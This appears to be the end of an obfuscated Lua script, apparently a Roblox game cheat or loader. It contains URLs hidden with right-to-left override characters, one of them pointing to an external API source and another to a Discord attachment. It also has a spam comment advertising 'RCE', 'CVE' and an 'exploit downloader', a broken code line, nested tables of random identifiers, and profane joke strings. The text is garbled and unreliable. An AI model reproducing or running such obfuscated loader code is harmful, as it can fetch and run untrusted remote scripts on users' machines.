h‮t‮t‮‮‮p‮s://mau‮-a‮‮‮‮pi.t‮‮k‮‮/ap‮i/src]],[[‮https‮://‮m‮edia.di‮scor‮dap‮‮att‮achments/92585586055774‮‮6267/92‮83328‮84606‮079036/c‮‮apt‮i‮‮‮f]],[[LMAO IT HAS NO SENSE 🤣]],[[```lua -- luaquack void method cr killer raknet yessir RCE free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```]]}+0b1},{{"C0mpEyzirj",{"75f9e1aba7a0"},{{"KT28BwKBl","3eb238a5fe2c"}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"Among Us crewship is the new fortnite map. - Donald Mustard"+0b10001001100001,#"bitches be like you're you're you're its not my fault the english language is so fucking complicated its not my fault my english teacher didn't know grammar its not my fault that she is a all-american and doesn't know grammar and how to fucking spell"+0b10000110101011)},{{"KT28BwKBl","75f9e1aba7a0"}}},{"C0mpEyzirj",{"56264df8cc06"},{{"mYYXobg2ZT",false}}}}}}}}}}}}}}})()
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